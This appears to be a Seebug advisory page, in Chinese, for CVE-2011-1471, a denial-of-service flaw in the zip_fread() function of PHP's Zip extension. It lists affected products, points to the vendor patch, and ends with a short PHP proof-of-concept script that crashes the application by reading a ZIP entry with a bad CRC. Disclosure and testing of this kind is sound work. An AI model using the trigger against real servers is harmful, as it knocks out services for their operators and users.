Lucene search

K
seebugRootSSV:20390
HistoryMar 27, 2011 - 12:00 a.m.

PHP "Zip"扩展"zip_fread()"函数拒绝服务漏洞

2011-03-2700:00:00
Root
www.seebug.org
37

EPSS

0.03

Percentile

91.0%

BUGTRAQ ID: 46975
CVE ID: CVE-2011-1471

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP "Zip"扩展"zip_fread()"函数在实现上存在拒绝服务漏洞,远程攻击者可利用此漏洞造成应用程序崩溃,拒绝服务和任意代码执行。

MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
PHP PHP 5.x
厂商补丁:

PHP

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.php.net


                                                提供了如下测试方法:

<?php
$o = new ZipArchive();
if (! $o->open('test.zip',ZipArchive::CHECKCONS)) {
    exit ('error can\'t open');
}
$o->getStream('file2'); // this file is ok
echo "OK";
$r = $o->getStream('file1'); // this file has a wrong crc
while (! feof($r)) {
    fread($r,1024);
}
echo "never here\n";
?>